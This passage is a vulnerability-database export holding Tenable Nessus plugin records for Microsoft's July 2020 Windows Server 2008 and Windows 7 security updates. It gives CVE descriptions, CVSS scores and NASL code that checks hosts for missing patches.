crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "KB4565529: Windows Server 2008 July 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1085", "CVE-2020-1147", "CVE-2020-1267", "CVE-2020-1333", "CVE-2020-1346", "CVE-2020-1354", "CVE-2020-1359", "CVE-2020-1360", "CVE-2020-1365", "CVE-2020-1371", "CVE-2020-1373", "CVE-2020-1384", "CVE-2020-1389", "CVE-2020-1390", "CVE-2020-1396", "CVE-2020-1397", "CVE-2020-1400", "CVE-2020-1401", "CVE-2020-1403", "CVE-2020-1407", "CVE-2020-1408", "CVE-2020-1409", "CVE-2020-1410", "CVE-2020-1412", "CVE-2020-1419", "CVE-2020-1421", "CVE-2020-1427", "CVE-2020-1428", "CVE-2020-1430", "CVE-2020-1435", "CVE-2020-1436", "CVE-2020-1437", "CVE-2020-1438", "CVE-2020-1468"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUL_4565536.NASL", "href": "https://www.tenable.com/plugins/nessus/138461", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138461);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1085\",\n \"CVE-2020-1147\",\n \"CVE-2020-1267\",\n \"CVE-2020-1333\",\n \"CVE-2020-1346\",\n \"CVE-2020-1354\",\n \"CVE-2020-1359\",\n \"CVE-2020-1360\",\n \"CVE-2020-1365\",\n \"CVE-2020-1371\",\n \"CVE-2020-1373\",\n \"CVE-2020-1384\",\n \"CVE-2020-1389\",\n \"CVE-2020-1390\",\n \"CVE-2020-1396\",\n \"CVE-2020-1397\",\n \"CVE-2020-1400\",\n \"CVE-2020-1401\",\n \"CVE-2020-1403\",\n \"CVE-2020-1407\",\n \"CVE-2020-1408\",\n \"CVE-2020-1409\",\n \"CVE-2020-1410\",\n \"CVE-2020-1412\",\n \"CVE-2020-1419\",\n \"CVE-2020-1421\",\n \"CVE-2020-1427\",\n \"CVE-2020-1428\",\n \"CVE-2020-1430\",\n \"CVE-2020-1435\",\n \"CVE-2020-1436\",\n \"CVE-2020-1437\",\n \"CVE-2020-1438\",\n \"CVE-2020-1468\"\n );\n script_xref(name:\"MSKB\", value:\"4565536\");\n script_xref(name:\"MSKB\", value:\"4565529\");\n script_xref(name:\"MSFT\", value:\"MS20-4565536\");\n script_xref(name:\"MSFT\", value:\"MS20-4565529\");\n script_xref(name:\"IAVA\", value:\"2020-A-0306-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0313-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4565529: Windows Server 2008 July 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565529\nor cumulative update 4565536. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that DirectWrite handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit an untrusted webpage. The security update\n addresses the vulnerability by correcting how\n DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Profile Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1403)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1468)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted fonts. For all systems except Windows 10, an\n attacker who successfully exploited the vulnerability\n could execute code remotely. For systems running Windows\n 10, an attacker who successfully exploited the\n vulnerability could execute code in an AppContainer\n sandbox context with limited privileges and\n capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. There are multiple ways an\n attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An elevation of privilege vulnerability exists when the\n Windows Modules Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when\n Windows Address Book (WAB) improperly processes vcard\n files. (CVE-2020-1410)\n\n - An elevation of privilege vulnerability exists when\n Group Policy Services Policy Processing improperly\n handle reparse points. An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Location Awareness Service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could allow an application\n with limited privileges on an affected system to execute\n code at a medium integrity level. (CVE-2020-1437)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the\n Windows Cryptography Next Generation (CNG) Key Isolation\n service improperly handles memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1359,\n CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1373, CVE-2020-1390,\n CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Function Discovery Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1389,\n CVE-2020-1419)\n\n - This security update corrects a denial of service in the\n Local Security Authority Subsystem Service (LSASS)\n caused when an authenticated attacker sends a specially\n crafted authentication request. A remote attacker who\n successfully exploited this vulnerability could cause a\n denial of service on the target system's LSASS service,\n which triggers an automatic reboot of the system. The\n security update addresses the vulnerability by changing\n the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1421)\");\n # https://support.microsoft.com/en-us/help/4565536/windows-server-2008-update-kb4565536\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e9e22c7\");\n # https://support.microsoft.com/en-us/help/4565529/windows-server-2008-update-kb4565529\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c89c5a1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4565529 or Cumulative Update KB4565536.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1435\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n '4565536',\n '4565529'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:[4565536, 4565529])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:16:11", "description": "The remote Windows host is missing security update 4565539 or cumulative update 4565524. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer. An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "KB4565539: Windows 7 and Windows Server 2008 R2 July 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1085", "CVE-2020-1147", "CVE-2020-1267", "CVE-2020-1333", "CVE-2020-1346", "CVE-2020-1351", "CVE-2020-1354", "CVE-2020-1359", "CVE-2020-1360", "CVE-2020-1365", "CVE-2020-1371", "CVE-2020-1373", "CVE-2020-1374", "CVE-2020-1384", "CVE-2020-1389", "CVE-2020-1390", "CVE-2020-1396", "CVE-2020-1397", "CVE-2020-1400", "CVE-2020-1401", "CVE-2020-1402", "CVE-2020-1403", "CVE-2020-1407", "CVE-2020-1408", "CVE-2020-1409", "CVE-2020-1410", "CVE-2020-1412", "CVE-2020-1419", "CVE-2020-1421", "CVE-2020-1427", "CVE-2020-1428", "CVE-2020-1430", "CVE-2020-1432", "CVE-2020-1435", "CVE-2020-1436", "CVE-2020-1437", "CVE-2020-1438", "CVE-2020-1468"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUL_4565524.NASL", "href": "https://www.tenable.com/plugins/nessus/138460", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138460);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1085\",\n \"CVE-2020-1147\",\n \"CVE-2020-1267\",\n \"CVE-2020-1333\",\n \"CVE-2020-1346\",\n \"CVE-2020-1351\",\n \"CVE-2020-1354\",\n \"CVE-2020-1359\",\n \"CVE-2020-1360\",\n \"CVE-2020-1365\",\n \"CVE-2020-1371\",\n \"CVE-2020-1373\",\n \"CVE-2020-1374\",\n \"CVE-2020-1384\",\n \"CVE-2020-1389\",\n \"CVE-2020-1390\",\n \"CVE-2020-1396\",\n \"CVE-2020-1397\",\n \"CVE-2020-1400\",\n \"CVE-2020-1401\",\n \"CVE-2020-1402\",\n \"CVE-2020-1403\",\n \"CVE-2020-1407\",\n \"CVE-2020-1408\",\n \"CVE-2020-1409\",\n \"CVE-2020-1410\",\n \"CVE-2020-1412\",\n \"CVE-2020-1419\",\n \"CVE-2020-1421\",\n \"CVE-2020-1427\",\n \"CVE-2020-1428\",\n \"CVE-2020-1430\",\n \"CVE-2020-1432\",\n \"CVE-2020-1435\",\n \"CVE-2020-1436\",\n \"CVE-2020-1437\",\n \"CVE-2020-1438\",\n \"CVE-2020-1468\"\n );\n script_xref(name:\"MSKB\", value:\"4565539\");\n script_xref(name:\"MSKB\", value:\"4565524\");\n script_xref(name:\"MSFT\", value:\"MS20-4565539\");\n script_xref(name:\"MSFT\", value:\"MS20-4565524\");\n script_xref(name:\"IAVA\", value:\"2020-A-0306-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0313-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4565539: Windows 7 and Windows Server 2008 R2 July 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565539\nor cumulative update 4565524. It is, therefore, affected by\nmultiple vulnerabilities 